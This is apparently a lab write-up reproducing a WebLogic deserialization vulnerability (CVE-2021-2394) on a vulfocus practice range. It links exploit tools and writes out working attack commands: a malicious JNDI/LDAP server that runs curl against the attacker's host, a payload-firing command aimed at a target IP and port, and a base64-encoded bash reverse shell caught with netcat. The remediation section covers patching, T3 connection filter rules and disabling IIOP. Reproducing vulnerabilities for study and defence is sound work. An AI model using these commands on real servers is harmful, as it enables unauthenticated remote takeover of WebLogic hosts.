1. Vulnerability overview
Oracle released its July 2021 Security Update Notice, which disclosed high-risk vulnerabilities in WebLogic components: an attacker who can reach the vulnerable WebLogic Server components over the IIOP or T3 protocol can attack them without authentication. An attacker who successfully exploits this vulnerability can take over WebLogic Server.
This is a secondary (nested) deserialization vulnerability: the call chains of CVE-2020-14756 and CVE-2020-14825 are combined into a new call chain that bypasses the WebLogic deserialization blacklist.
2. Affected versions
Oracle WebLogic Server 10.3.6.0.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 12.2.1.3.0
Oracle WebLogic Server 12.2.1.4.0
Oracle WebLogic Server 14.1.1.0.0
3. Reproduction environment
vulfocus online range
4. Vulnerability reproduction
The following tools are required for reproduction:
JNDI injection: https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
Exploitation: https://download.csdn.net/download/qq_41904294/87667743
Start the range and check that the environment is ready (reproduced on version 12.2.1.3.0).
Use JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar to start a malicious LDAP service and have it run a curl command:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "curl vpsip" -A vpsip
Start an HTTP service with python3:
python3 -m http.server 80
Perform the malicious injection with the exploitation tool:
java -jar weblogic\ tools.jar -H 123.58.224.8 -P 30706 -payload 20212394 -jndi ldap://x.x.x.x:1389/xxx
# -H is the target address (WebLogic server IP), -P is the target port, -jndi is the address of the LDAP service started above
As you can see, the curl command was executed successfully.
Reverse shell
Start an LDAP service with JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,base64-encoded reverse shell command}|{base64,-d}|{bash,-i}" -A VPSip
Start netcat (the "Swiss Army knife") listening in advance, then use the toolkit to make the target load the LDAP service and perform the reverse shell operation.
The shell connects back successfully and the flag can be read.
5. Remediation
Patch update
Oracle has released patches for the vulnerabilities described above. Refer to the official announcement to download the update patches for affected products promptly, and follow the readme file in the patch installation package to install the update so that protection is effective over the long term.
Note: Oracle's official patch requires the user to have a licensed account of the genuine software. After logging in to https://support.oracle.com with this account, you can download the latest patch.
Temporary Mitigation
If the update patch cannot be installed immediately, the vulnerability can be mitigated temporarily with the following measures:
(1) Restrict T3 protocol access
Attacks that exploit the vulnerability over the T3 protocol can be blocked temporarily by controlling access to T3. WebLogic Server provides a default connection filter named weblogic.security.net.ConnectionFilterImpl; with no rules configured it accepts all incoming connections. Rules configured for this connection filter control which clients may use the T3 and T3s protocols.
(2) Disable the IIOP protocol
Attacks that exploit the vulnerability over the IIOP protocol can be blocked by disabling IIOP on the server.
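As an added example (not part of the original post and not taken from Oracle's documentation), both mitigations expressed as a config.xml fragment: connection filter rules that let only an assumed admin subnet and the local host use T3/T3s, and the IIOP listener switched off. The subnet 10.0.0.0/24 and the server name are placeholders for your own environment.

```xml
<!-- Added example: config.xml fragment, not from the original post.
     10.0.0.0/24 and the server name are placeholders. -->
<security-configuration>
  <!-- Mitigation (1): the default filter. With no rules it accepts every
       inbound connection, so the rules below are what actually restrict T3. -->
  <connection-filter>weblogic.security.net.ConnectionFilterImpl</connection-filter>

  <!-- Rule syntax: target localAddress localPort action protocols
       Rules are evaluated top to bottom and the first match wins,
       so the catch-all deny must stay last. Only t3/t3s are named;
       HTTP/HTTPS application traffic is unaffected. -->
  <connection-filter-rule>10.0.0.0/24 * * allow t3 t3s</connection-filter-rule>
  <connection-filter-rule>127.0.0.1 * * allow t3 t3s</connection-filter-rule>
  <connection-filter-rule>0.0.0.0/0 * * deny t3 t3s</connection-filter-rule>
</security-configuration>

<server>
  <name>AdminServer</name>
  <!-- Mitigation (2): turn the IIOP listener off on this server -->
  <iiop-enabled>false</iiop-enabled>
</server>
```

The same settings can be made in the Administration Console (Domain > Security > Filter for the rules, and the server's Protocols > IIOP page for the listener); a restart is needed for config.xml edits made by hand to take effect.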
Reference link
https://www.oracle.com/security-alerts/cpujul2021.html#AppendixFMW